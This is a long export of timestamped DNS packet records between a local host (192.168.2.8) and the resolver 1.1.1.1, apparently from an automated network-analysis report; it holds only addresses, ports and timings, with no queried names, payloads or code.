                                                                                                                                                                                                          Nov 11, 2024 18:24:10.268184900 CET5198453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.268275023 CET5457153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.268426895 CET53509761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.268745899 CET53573411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.269540071 CET53618581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.270035028 CET5359853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.270168066 CET53586561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.270236015 CET53545321.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.271187067 CET53633011.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.271543980 CET53575371.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.273521900 CET53495391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.276526928 CET53652141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.277239084 CET53586021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.277851105 CET53545711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.278145075 CET53558121.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.279958010 CET53643631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.280083895 CET53541091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.280090094 CET53585611.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.280092955 CET53535981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.280699015 CET53653601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.287456989 CET53558891.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.288073063 CET53519131.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.289472103 CET53517761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.295634985 CET53590021.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.298752069 CET53519841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.383058071 CET5327953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.414547920 CET53532791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.428436041 CET53579651.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.431871891 CET53573061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:10.612317085 CET53606811.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.104195118 CET6335353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.104449034 CET6400553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.104940891 CET5496753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.105664015 CET6482653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.110209942 CET5182153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.111139059 CET6099453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.111175060 CET6132853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.114051104 CET53640051.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.114497900 CET53633531.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.114847898 CET53549671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.121810913 CET53609941.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.121942043 CET5963953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.123812914 CET6117253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.124394894 CET6332853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.124895096 CET5297253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.125478029 CET6549253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.125601053 CET6525453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.126434088 CET6082853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.127016068 CET5775953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.127069950 CET5547553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.127876997 CET5083953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.128525972 CET6329053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.128998995 CET4967853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.128998995 CET5781153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.129090071 CET5196453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.129611015 CET5577453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.129677057 CET5333453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.130609989 CET5734553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.130626917 CET6248553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.131237030 CET5725153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.131393909 CET5507653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.131867886 CET5813353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.132154942 CET5588053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.132576942 CET6174653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.132709026 CET5327653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.133239985 CET6509753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.133595943 CET5646053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.133941889 CET53611721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.134399891 CET6184453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.134629011 CET53652541.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.134675980 CET53529721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.135153055 CET5461553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.135339975 CET6139253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.136459112 CET53608281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.136470079 CET53648261.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.136543036 CET53554751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.138866901 CET53632901.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.139067888 CET5847553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.139343977 CET53496781.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.139465094 CET53533341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.140136003 CET53573451.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.140655994 CET53624851.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.141052008 CET53581331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.141184092 CET53557741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.141608000 CET53518211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.142138004 CET53532761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.142410040 CET53650971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.142745972 CET53572511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.143558025 CET53617461.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.143862009 CET53558801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.147136927 CET53613921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.150268078 CET6328053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.150614977 CET5787453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.150767088 CET6547953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.151730061 CET5058353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.152992010 CET53596391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.153321981 CET6282053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.153661966 CET6227053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.154195070 CET6418053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.155700922 CET53633281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.157608032 CET53654921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.158334017 CET53577591.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.159692049 CET53508391.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.160741091 CET53632801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.161346912 CET53505831.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.162415028 CET53578111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.163518906 CET5511853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.163901091 CET53550761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.164062023 CET5867053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.164282084 CET53628201.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.164340973 CET53622701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.166898012 CET53641801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.167520046 CET53546151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.170047998 CET53584751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.174860001 CET5765053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.174978018 CET53551181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.175455093 CET53586701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.181530952 CET53654791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.181725025 CET53578741.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.185945988 CET6006353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186157942 CET5816753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186328888 CET5527553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186491013 CET5901953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.186698914 CET5694353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.187148094 CET6148653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.187494040 CET5972453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.187668085 CET6412753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.188628912 CET53576501.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.191400051 CET5797153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.196258068 CET53641271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.196341991 CET53581671.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.196789980 CET53590191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.196938038 CET53569431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.197541952 CET53614861.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.197982073 CET53597241.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.200618029 CET53579711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.216749907 CET53613281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.217708111 CET5012753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.218173027 CET53600631.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.218878031 CET6097153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.223099947 CET5998253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.224149942 CET5691753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.227149010 CET6469653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.227485895 CET6488453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.229041100 CET53501271.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.231432915 CET5840453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.231648922 CET6284853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.234158993 CET53569171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.236586094 CET53609711.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.237849951 CET53648841.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.240345001 CET53599821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.240798950 CET53584041.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.242528915 CET53628481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.258840084 CET53646961.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.337341070 CET53618441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.439332008 CET53564601.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.458416939 CET53519641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:16.596090078 CET53552751.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.055772066 CET5256453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.082470894 CET6034353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.090362072 CET53603431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.413357019 CET53525641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.886148930 CET6249253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.889928102 CET6361753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.890916109 CET5870653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.892426968 CET5191753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.894296885 CET6038253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.894504070 CET53624921.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.896173000 CET6421553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.897440910 CET5250353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.897984982 CET5931953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.898575068 CET5412553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.898914099 CET5889753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.899432898 CET6194053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.901096106 CET53587061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.901626110 CET5694153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.902441978 CET53519171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.902869940 CET6284453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.904661894 CET53603821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.905828953 CET5467653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.906132936 CET53642151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.907567978 CET53636171.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.909317970 CET53588971.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.909378052 CET53593191.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.909905910 CET53541251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.912877083 CET53628441.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.913044930 CET5941853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.915437937 CET6256253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.920247078 CET6197253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.922343969 CET53594181.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.924899101 CET53625621.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.926701069 CET6293653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.929590940 CET53619721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.929922104 CET53525031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.929924011 CET6419853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.930181980 CET53619401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.930286884 CET5925153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.932799101 CET5992253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.933029890 CET53569411.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.936968088 CET53546761.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.937597990 CET5643353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.940262079 CET6431553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.940439939 CET53592511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.940872908 CET53641981.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.942461967 CET5246453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.942529917 CET53599221.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.943584919 CET5995253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.948517084 CET53564331.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.950917006 CET53643151.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.953176975 CET5756653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.953598976 CET53599521.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.955110073 CET53524641.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.956360102 CET5394053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.957981110 CET53629361.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.959099054 CET6228053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.961899042 CET5096653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.962480068 CET5762553192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.963397980 CET5520653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.965799093 CET5575653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.967516899 CET6182853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.968915939 CET53622801.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.968928099 CET5853853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.970185041 CET6275153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.970992088 CET6202153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.972575903 CET5394353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.974215031 CET53552061.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.977760077 CET53557561.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.978236914 CET53618281.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.980146885 CET53627511.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.980572939 CET53585381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.980907917 CET53509661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.983107090 CET53539431.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.985131025 CET53575661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.987957954 CET53539401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.994080067 CET53620211.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:17.996524096 CET53576251.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.003016949 CET5524253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.003210068 CET5317053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006541967 CET5550953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006719112 CET6240353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.006871939 CET5121653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007148981 CET5434853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007148981 CET5565853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007281065 CET5363853192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.007431984 CET5314253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.012125969 CET6056653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.013648033 CET53531701.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.016846895 CET53624031.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.016879082 CET53536381.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.016980886 CET53512161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.017113924 CET53555091.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.018055916 CET53543481.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.019779921 CET5724053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.021855116 CET53605661.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.025954962 CET5051653192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.026531935 CET4966953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027014017 CET5487953192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027168989 CET6051153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027321100 CET5811153192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027467012 CET5458753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.027805090 CET6270753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.030065060 CET53572401.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.034864902 CET53552421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.037286043 CET53545871.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.037632942 CET53605111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.038108110 CET53531421.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.038729906 CET53581111.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.039509058 CET6521453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.040241957 CET53556581.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.048966885 CET53652141.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.056596041 CET6298253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.056787968 CET53505161.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.057599068 CET53548791.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.057725906 CET53496691.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.060008049 CET53627071.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.069231987 CET53629821.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.098437071 CET5633453192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.102458000 CET5767253192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.103123903 CET5579353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.103626966 CET5562353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.114320993 CET53556231.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.120975018 CET53576721.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.129086971 CET53563341.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.134105921 CET53557931.1.1.1192.168.2.8
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168229103 CET6034053192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168548107 CET6164753192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.168690920 CET5184353192.168.2.81.1.1.1
                                                                                                                                                                                                          Nov 11, 2024 18:24:18.176363945 CET53603401.1.1.1192.168.2.8
